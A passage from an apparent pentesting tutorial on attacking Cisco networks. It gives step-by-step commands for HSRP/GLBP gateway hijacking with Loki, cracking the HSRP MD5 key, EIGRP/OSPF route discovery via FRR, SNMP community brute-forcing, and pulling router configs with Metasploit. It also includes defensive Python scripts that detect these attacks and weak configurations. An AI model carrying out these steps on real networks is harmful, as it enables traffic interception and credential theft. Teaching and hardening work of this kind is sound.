caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0

You will then need to configure a new default route and delete the old one. The new route must go through the former Active router. If this is not done, legitimate host traffic will terminate at the attacker's computer, which will inevitably lead to DoS.

caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1

You can also enable NAT to capture not only incoming but also outgoing traffic.

caster@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

However, this NAT rule may cause side effects. For example, a customer's infrastructure may have Zabbix agents whose addresses the attacker would effectively spoof: with masquerading, the Zabbix server can no longer reach its agents, because the traffic of the legitimate hosts now appears to come from the attacker's address.
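As an added example (not part of the original article, and not Loki's code), the following Python script shows the defender's side of what was just described: it decodes HSRP hellos from the UDP/1985 payload, reports the weaknesses visible in the lab traffic above (plaintext or default key, Active priority below 255) and alerts when a new source announces a higher priority for a group, which is exactly the footprint of the Loki packet. The three sample packets are constructed for the demo, not captured; the source addresses mirror the lab (172.16.0.1 Active, 172.16.0.2 Standby, 172.16.0.3 attacker). The MD5 TLV check assumes the HSRPv1 layout in which an authentication TLV of type 4 follows the fixed header.

```python
import struct
from ipaddress import IPv4Address

HSRP_LEN = 20   # fixed HSRPv0 header (RFC 2281); an MD5 auth TLV may follow it
OPCODES = {0: "Hello", 1: "Coup", 2: "Resign"}
STATES = {0: "Initial", 1: "Learn", 2: "Listen", 4: "Speak", 8: "Standby", 16: "Active"}


def parse_hsrp(payload):
    """Decode one HSRP packet (UDP/1985 payload) into a dict."""
    if len(payload) < HSRP_LEN:
        raise ValueError("HSRP payload shorter than %d bytes" % HSRP_LEN)
    (version, opcode, state, hello, hold, prio, group,
     _reserved, auth, vip) = struct.unpack("!BBBBBBBB8s4s", payload[:HSRP_LEN])
    return {
        "version": version,
        "opcode": OPCODES.get(opcode, opcode),
        "state": STATES.get(state, state),
        "hellotime": hello,
        "holdtime": hold,
        "priority": prio,
        "group": group,
        # plaintext key, NUL-padded to 8 bytes; Cisco's default is "cisco"
        "auth": auth.rstrip(b"\x00").decode("ascii", "replace"),
        # assumption: HSRPv1 MD5 authentication is carried in a TLV of type 4 after the header
        "md5": len(payload) > HSRP_LEN and payload[HSRP_LEN] == 4,
        "vip": str(IPv4Address(vip)),
    }


def audit(pkt):
    """Configuration weaknesses visible in a single legitimate hello."""
    issues = []
    if not pkt["md5"]:
        issues.append("no MD5 authentication (plaintext key '%s' is sniffable)" % pkt["auth"])
    if pkt["auth"] == "cisco":
        issues.append("default plaintext key 'cisco'")
    if pkt["state"] == "Active" and pkt["priority"] < 255:
        issues.append("Active priority %d < 255: a higher-priority hello can preempt it"
                      % pkt["priority"])
    return issues


class HsrpMonitor:
    """Remember who is Active per group and alert when another source outbids it."""

    def __init__(self):
        self.active = {}  # group -> (src_ip, priority)

    def observe(self, src_ip, payload):
        pkt = parse_hsrp(payload)
        if pkt["opcode"] != "Hello":
            return []
        group, known = pkt["group"], self.active.get(pkt["group"])
        if known is None:
            if pkt["state"] == "Active":
                self.active[group] = (src_ip, pkt["priority"])
            return []
        if src_ip != known[0] and pkt["priority"] > known[1]:
            # the higher priority wins the group; record it so the takeover keeps being tracked
            self.active[group] = (src_ip, pkt["priority"])
            return ["group %d: %s announced priority %d and displaced Active %s (priority %d)"
                    % (group, src_ip, pkt["priority"], known[0], known[1])]
        return []


# Constructed sample traffic (not a real capture) mirroring the lab above:
# Active 172.16.0.1 at priority 150, Standby 172.16.0.2 at 100, then a
# priority-255 Active hello from the attacker host 172.16.0.3. All carry
# group 1, plaintext key "cisco" and virtual IP 172.16.0.254.
SAMPLE = [
    ("172.16.0.1", bytes.fromhex("00001003 0a960100 636973636f000000 ac1000fe")),
    ("172.16.0.2", bytes.fromhex("00000803 0a640100 636973636f000000 ac1000fe")),
    ("172.16.0.3", bytes.fromhex("00001003 0aff0100 636973636f000000 ac1000fe")),
]


def run_demo():
    """Replay SAMPLE through the monitor and return the alerts it raised."""
    monitor, alerts = HsrpMonitor(), []
    for src, payload in SAMPLE:
        alerts.extend(monitor.observe(src, payload))
    return alerts


if __name__ == "__main__":
    for issue in audit(parse_hsrp(SAMPLE[0][1])):
        print("weakness:", issue)
    for alert in run_demo():
        print("alert:", alert)
```

Fed from a SPAN port or a pcap, the same two functions give a network team both the static finding (group 1 runs with the default plaintext key and an Active priority of 150) and the live alert the moment a third host announces priority 255 for that group.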

This concludes the attack on HSRP; now it is time to analyze the traffic for sensitive data:

Captured FTP account

Verification of a captured lyrica account:

Authentication Cracking

Authentication in the HSRP domain can make life harder for an attacker, but its mere presence guarantees nothing: an attacker may well be able to brute-force the authentication password.

This is done by listening to and recording the traffic, extracting the hashes with hsrp2john.py, and then brute-forcing them with John.

HSRP MD5 Authentication header
caster@kali:~/lyrica$ python2 hsrp2john.py hsrptraffic.pcap
HSRP MD5 hashes
Bruteforce with John

This is how an authentication attack on an HSRP domain is performed. The password is myownsummershoveit.

GLBP Attacks

GLBP (Gateway Load Balancing Protocol) is a protocol developed by Cisco to provide load balancing and fault tolerance in networks. It allows multiple routers to share a single virtual IP address and dynamically distribute load among them.

GLBP is another protocol from the FHRP class, also made by Cisco engineers. It differs from HSRP in that it offers load balancing in addition to redundancy.

GLBP Theory

GLBP works by creating a group of routers, one of which is designated as the active virtual gateway (AVG) and the others as active virtual forwarders (AVFs). The AVG is responsible for load balancing among the AVFs by assigning to each request the virtual MAC address of one of the AVFs.

GLBP terminology is as follows:

  • AVG (Active Virtual Gateway) — the device that heads the entire GLBP logical domain. The AVG tells the other routers how to handle legitimate traffic, hands out virtual MAC addresses and is responsible for answering ARP requests. A single GLBP group has exactly one AVG.
  • AVF (Active Virtual Forwarder) — a device in the GLBP domain that forwards traffic. There can be several of them.
  • GLBP Group — a logical GLBP group that includes physical routers. Each GLBP logical group has its own unique numeric identifier.
  • GLBP MAC — the virtual MAC address of an AVF member, distributed by the current AVG router.
  • GLBP Virtual IP Address — the IP address the AVG router is responsible for.
  • GLBP Preempt Mode — an option that lets a recovered device reclaim its role from the device that replaced it, based on priority values. By default, preempt mode is disabled for the AVG role and enabled for the AVF role (with a delay of up to 30 seconds, which can be configured manually).
  • GLBP Weight — a metric indicating the load on the device interface. The greater this metric is, the higher the load on the router interface.

GLBP Spoofing Theory

It works the same way as with HSRP: send a packet with the highest priority and weight values. This, too, is done with Loki.

GLBP Lab Network

In my lab, the attacker is on the 172.16.0.0/24 network.
There are two GLBP speakers here: 172.16.0.1 is the AVG router, while 172.16.0.2 is an AVF router. They serve the address 172.16.0.254.
The attacker's address is 172.16.0.3.

GLBP Spoofing

The preparation is the same as in the HSRP chapter; keep that in mind.

Likewise, start Loki and choose your network interface.

Loki found the GLBP packets

This is what a GLBP packet from an AVG router looks like. Priority is 130, GLBP group number is 1.

Now you need to start spoofing: again, click on Get IP and select Gratuitous ARP.
Loki will generate a special GLBP packet with a priority of 255 and a weight value of 255. The higher the GLBP weight, the higher the load on the interface.

Loki spoofs GLBP
GLBP packet with maximum priority value

Then set the GLBP virtual address as a secondary address on your interface:

caster@kali:~$ sudo ifconfig eth0:1 172.16.0.254 netmask 255.255.255.0

Then set up a new default route through the former AVG router, deleting the old one first. Again, if you do not do this, the legitimate hosts' traffic terminates at your device instead of being forwarded, which leads to a DoS.

caster@kali:~$ sudo route del default
caster@kali:~$ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 172.16.0.1

This completes the attack on GLBP; you can now listen to the traffic for sensitive data:

Captured FTP credentials

Verify this account from FTP:

This is how GLBP is attacked. The attack carries a lot of risk, so it is not always used, even when the GLBP configuration is vulnerable to it.

Searching for subnets with EIGRP

EIGRP (Enhanced Interior Gateway Routing Protocol) is a dynamic routing protocol developed by Cisco for use in enterprise networks. It is efficient and scalable, but can be vulnerable to attack if not properly configured.

In fact, there are plenty of attacks on dynamic routing, but most have very little impact. Perhaps the most practical one is subnet discovery.
The idea is that the attacker joins the routing domain, and since establishing a neighborship automatically triggers an exchange of routing information, the attacker learns about the existing subnets without resorting to scanning. This is a useful time-saving trick.

EIGRP Packets

Within my lab network there is an EIGRP speaker at the address 192.168.1.89.
The AS number is 100.

FRRouting

With FRR, an attacker can connect to the EIGRP routing domain. But it requires a little bit of configuration.

caster@kali:~$ sudo apt install frr

After installing FRRouting, you must edit the daemons configuration file and set eigrpd=yes:

caster@kali:~$ sudo nano /etc/frr/daemons
caster@kali:~$ sudo systemctl restart frr

Now you need to enter the FRR shell, vtysh:

caster@kali:~$ sudo vtysh

Now you need to start the EIGRP process with AS number 100 and declare your own address with a /32 mask to establish the neighborship.

kali# config t
kali(config)# router eigrp 100
kali(config-router)# network 192.168.1.103/32

Traffic at the time of EIGRP neighborhood establishment

The screenshot above shows the EIGRP traffic at the time the neighborship was set up. To see the list of your EIGRP neighbors:

kali# show ip eigrp neighbors
EIGRP neighbors
Routing table

After the neighborship between the attacker and the EIGRP speaker was established, two new subnets, 10.134.25.0/24 and 10.178.121.0/24, appeared in the attacker's routing table.
This is subnet information collected by, shall we say, abusing dynamic routing protocols.

Searching for subnets with OSPF

OSPF (Open Shortest Path First), an intra-domain dynamic routing protocol, is used in almost every major corporate network.
In an attack context it is useful for the same purpose: subnet discovery, the same trick as with EIGRP.
However, you have to realize that OSPF and EIGRP are completely different protocols, each with its own philosophy.

You must enable the ospfd daemon to run the OSPF process on the attacker's computer:

ospfd=yes

You then need to join the OSPF domain, which is done by declaring your address. In my case it is 192.168.1.103/32, and the area is 0.0.0.0.

kali# conf t
kali(config)# router ospf
kali(config-router)# network 192.168.1.103/32 area 0.0.0.0
kali(config-router)# 

This is traffic at the time of neighbor establishment, OSPF service message exchange (DB Description, LSU, LSR, LSAck):

The OSPF neighborship is established; my neighbor is 192.168.1.89:

kali# show ip ospf ne

Neighbor ID     Pri State           Up Time         Dead Time Address         Interface                        RXmtL RqstL DBsmL
10.134.25.11      1 Full/DR         2m07s             35.482s 192.168.1.89    eth0:192.168.1.103                   0     0     0

kali# 

If we look at the routing table, we see new routes!

kali# show ip route
Codes: K - kernel route, C - connected, L - local, S - static,
       R - RIP, O - OSPF, I - IS-IS, B - BGP, E - EIGRP, N - NHRP,
       T - Table, v - VNC, V - VNC-Direct, A - Babel, F - PBR,
       f - OpenFabric, t - Table-Direct,
       > - selected route, * - FIB route, q - queued, r - rejected, b - backup
       t - trapped, o - offload failure

K>* 0.0.0.0/0 [0/100] via 192.168.1.1, eth0, src 192.168.1.103, 00:08:36
O   10.134.25.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O   10.178.121.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O>* 192.168.1.0/24 [110/100] is directly connected, eth0, weight 1, 00:02:22
L>* 192.168.1.103/32 is directly connected, eth0, 00:08:36

They are 10.134.25.0/24 and 10.178.121.0/24.
The attacker learned about them without any scanning. That is the benefit of this trick: a simple FRR setup, a neighborship, and information about the existing networks is gathered. It is as simple as that.
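An added example, not part of the article and not FRRouting's code: the Python below does for a defender what the FRR walk-through above does for an attacker, in reverse. It parses the OSPFv2 header (RFC 2328) and the EIGRP header plus its TLV list from raw packet payloads, and reports hellos that carry no authentication (OSPF AuType 0, or no EIGRP authentication TLV of type 0x0002) as well as hellos from any source not in a router inventory, which is how a rogue FRR neighbor would show up. KNOWN_SPEAKERS and the four sample hellos are constructed for the demo (checksums left at zero, addresses and router IDs taken from the lab); the EIGRP authentication TLV body is a zeroed placeholder, since only its type matters for the check.

```python
import struct
from ipaddress import IPv4Address

OSPF_AUTYPES = {0: "null", 1: "simple password", 2: "cryptographic"}
OSPF_HELLO = 1
EIGRP_HELLO = 5
EIGRP_TLV_AUTH = 0x0002            # authentication TLV; absent means an open domain
KNOWN_SPEAKERS = {"192.168.1.89"}  # constructed router inventory for the segment


def parse_ospf_header(payload):
    """Decode the 24-byte OSPFv2 header (RFC 2328, A.3.1)."""
    if len(payload) < 24:
        raise ValueError("OSPF packet shorter than 24 bytes")
    version, ptype, length, rid, area, _csum, autype = struct.unpack("!BBHIIHH", payload[:16])
    return {"version": version, "type": ptype, "length": length,
            "router_id": str(IPv4Address(rid)), "area": str(IPv4Address(area)),
            "autype": OSPF_AUTYPES.get(autype, autype)}


def parse_eigrp_hello(payload):
    """Decode the 20-byte EIGRP header and list the TLV types that follow it."""
    if len(payload) < 20:
        raise ValueError("EIGRP packet shorter than 20 bytes")
    version, opcode, _csum, _flags, _seq, _ack, _vrid, asn = struct.unpack("!BBHIIIHH", payload[:20])
    tlv_types, off = [], 20
    while off + 4 <= len(payload):
        ttype, tlen = struct.unpack("!HH", payload[off:off + 4])
        if tlen < 4:               # a malformed length would otherwise loop forever
            break
        tlv_types.append(ttype)
        off += tlen
    return {"version": version, "opcode": opcode, "as": asn, "tlvs": tlv_types,
            "authenticated": EIGRP_TLV_AUTH in tlv_types}


def audit_hello(proto, src_ip, payload):
    """Return the findings for one hello seen on the wire."""
    findings = []
    if proto == "ospf":
        hdr = parse_ospf_header(payload)
        if hdr["type"] != OSPF_HELLO:
            return findings
        who = "OSPF router-id %s (%s, area %s)" % (hdr["router_id"], src_ip, hdr["area"])
        if hdr["autype"] == "null":
            findings.append(who + ": null authentication, any host on the segment can form an adjacency")
    elif proto == "eigrp":
        hdr = parse_eigrp_hello(payload)
        if hdr["opcode"] != EIGRP_HELLO:
            return findings
        who = "EIGRP AS %d speaker %s" % (hdr["as"], src_ip)
        if not hdr["authenticated"]:
            findings.append(who + ": hello carries no authentication TLV")
    else:
        raise ValueError("unknown protocol " + proto)
    if src_ip not in KNOWN_SPEAKERS:
        findings.append(who + ": unexpected speaker, not in the router inventory")
    return findings


# Constructed hellos (checksums zero): OSPF from router-id 10.134.25.11 in area 0 with
# AuType 0, the same hello from the FRR host 192.168.1.103, an EIGRP AS 100 hello with
# only Parameters (0x0001) and Software Version (0x0004) TLVs, and one that also
# carries a placeholder Authentication TLV (0x0002).
OSPF_HELLO_LEGIT = bytes.fromhex(
    "0201002c 0a86190b 00000000 00000000 0000000000000000"
    "ffffff00 000a0201 00000028 c0a80159 00000000")
OSPF_HELLO_UNKNOWN = bytes.fromhex(
    "0201002c c0a80167 00000000 00000000 0000000000000000"
    "ffffff00 000a0201 00000028 c0a80159 00000000")
EIGRP_HEADER = "0205 0000 00000000 00000000 00000000 0000 0064"
EIGRP_HELLO_OPEN = bytes.fromhex(EIGRP_HEADER + "0001000c 01000100 0000000f 00040008 0c000200")
EIGRP_HELLO_AUTH = bytes.fromhex(EIGRP_HEADER + "0002002c" + "00" * 40 + "0001000c 01000100 0000000f")

SAMPLES = [
    ("ospf", "192.168.1.89", OSPF_HELLO_LEGIT),
    ("ospf", "192.168.1.103", OSPF_HELLO_UNKNOWN),
    ("eigrp", "192.168.1.89", EIGRP_HELLO_OPEN),
    ("eigrp", "192.168.1.89", EIGRP_HELLO_AUTH),
]


def run_demo():
    """Audit every sample hello and return all findings."""
    out = []
    for proto, src, payload in SAMPLES:
        out.extend(audit_hello(proto, src, payload))
    return out


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

The two signals complement each other: the authentication finding tells the network team that the domain is open, and the inventory finding fires the moment an unexpected speaker such as the FRR host above sends its first hello, which is well before it has learned any prefixes.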

Router Configuration Upload

If an attacker finds an SNMP RW community string for a Cisco router, they can pull the router's configuration in plaintext. The Metasploit module cisco_config_tftp does this. With such a configuration file an attacker learns about infrastructure features, obtains password hashes, can attempt to brute-force them, and so on.

This is a fairly simple attack vector: first find the RW string, then run the MSF module.

Found SNMP port on Cisco router

SNMP RW string bruteforce can be performed using onesixtyone:

caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89 
Scanning 1 hosts, 3219 communities
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2020 by Cisco Systems, Inc.  Compiled Sat 31-Oct-20 13:1
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2020 by Cisco Systems, Inc.  Compiled Sat 31-Oct-20 13:1
192.168.1.89 [cisco] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2020 by Cisco Systems, Inc.  Compiled Sat 31-Oct-20 13:1
Found SNMP Community strings

In my case the string cisco has RW permissions, and it is the one used for this attack.

Now you need to run MSF and load the cisco_config_tftp module:

caster@kali:~$ msfconsole

msf6 > use auxiliary/scanner/snmp/cisco_config_tftp
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > show options

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   LHOST                       no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      161              yes       The target port (UDP)
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/snmp/cisco_config_tftp) > 

Once the community string, the target address, and the directory to save the file in are set, the module retrieves the configuration file:

msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY cisco
COMMUNITY => cisco
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/caster/
OUTPUTDIR => /home/caster/
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 192.168.1.89...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 192.168.1.89 - 192.168.1.89.txt 6210 bytes
[*] Saved configuration file to /home/caster/192.168.1.89.txt
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > 
Reading an uploaded configuration file

Thus, when an RW string is found, the Cisco router's configuration can be read without any other authentication. It is highly recommended to use complex community strings and to filter access to the SNMP port with ACLs.

Config Analyzing

CCAT is a tool that automates the search for network security issues in a Cisco IOS configuration file. It is quite a powerful solution, as it analyzes every part of the configuration in detail: routing, switch ports, DP, etc.

caster@kali:~/ccat$ python3 ccat.py ~/192.168.1.89.txt
Configuration analysis with CCAT

This tool makes life easier for network engineers and system administrators. CCAT also allows you to improve the quality of device hardening.
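As an added illustration of the kind of checks CCAT automates, and of the SNMP recommendation above, here is a small Python audit (not CCAT's code, and not the article's) that reads an IOS running-config and flags the settings this article exploits: RW SNMP communities without an ACL, default community names, HSRP/GLBP groups without MD5 authentication or with a priority below 255, routing processes that are not passive by default, and the HTTP Web UI left on. SAMPLE_CONFIG is a constructed configuration built from the lab addresses, not the file pulled via cisco_config_tftp; the key string and community names in it are placeholders.

```python
import re

# Constructed running-config for the demo (not the file pulled in the article).
SAMPLE_CONFIG = """\
hostname R1
ip http server
no ip http secure-server
interface GigabitEthernet0/0
 ip address 172.16.0.1 255.255.255.0
 standby 1 ip 172.16.0.254
 standby 1 priority 150
 standby 1 preempt
interface GigabitEthernet0/1
 ip address 10.134.25.11 255.255.255.0
 glbp 1 ip 10.134.25.254
 glbp 1 priority 130
 glbp 1 authentication md5 key-string CONSTRUCTED-KEY
router eigrp 100
 network 192.168.1.0 0.0.0.255
router ospf 1
 network 192.168.1.0 0.0.0.255 area 0
 passive-interface default
 no passive-interface GigabitEthernet0/0
snmp-server community public RO
snmp-server community cisco RW
snmp-server community Xk29-rw RW 10
"""

SNMP_RE = re.compile(r"^snmp-server community (\S+)(?: view \S+)?(?: (RO|RW))?(?: (\S+))?$")
FHRP_RE = re.compile(r"^(standby|glbp) (\d+) (ip|priority|authentication)\b\s*(.*)$")
WEAK_COMMUNITIES = {"public", "private", "cisco"}


def blocks(text):
    """Group the config into (top-level line, [indented child lines]) pairs."""
    out = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw[0] in " \t" and out:
            out[-1][1].append(raw.strip())
        else:
            out.append((raw.strip(), []))
    return out


def audit_config(text):
    """Return a list of findings, one string each, for the config text."""
    findings = []
    for head, body in blocks(text):
        if head == "ip http server":
            findings.append("ip http server: Web UI reachable over plain HTTP; restrict it with an ACL or disable it")
        m = SNMP_RE.match(head)
        if m:
            name, mode, acl = m.groups()
            mode = mode or "RO"  # IOS defaults to RO when the mode is omitted
            if mode == "RW" and not acl:
                findings.append("snmp-server community '%s' RW without ACL: the running-config can be pulled over TFTP" % name)
            if name in WEAK_COMMUNITIES:
                findings.append("snmp-server community '%s': default or guessable name" % name)
        if head.startswith("router ") and "passive-interface default" not in body:
            findings.append("%s: not passive by default, neighbours are accepted on every interface" % head)
        if head.startswith("interface "):
            groups = {}
            for line in body:
                m = FHRP_RE.match(line)
                if m:
                    proto, num, key, rest = m.groups()
                    groups.setdefault((proto, num), {})[key] = rest
            for (proto, num), cfg in groups.items():
                if "ip" not in cfg:
                    continue  # a group without a virtual IP serves nothing
                label = "%s: %s %s" % (head, proto, num)
                if not cfg.get("authentication", "").startswith("md5"):
                    findings.append(label + " has no MD5 authentication")
                prio = int(cfg.get("priority", "100"))  # IOS default priority is 100
                if prio < 255:
                    findings.append("%s priority %d (<255): a higher-priority hello can take the Active role" % (label, prio))
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

Run against the sample, the audit reports exactly the conditions used earlier in the article (an RW community without an ACL, an HSRP group with no authentication and priority 150, an EIGRP process that accepts neighbours everywhere) while staying silent on the hardened GLBP and OSPF blocks, which is the shape of report a team wants before a pentester pulls the file for them.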

Outro

In this article I have demonstrated attacks on Cisco IOS; I expect it to help both pentesters and network security professionals.
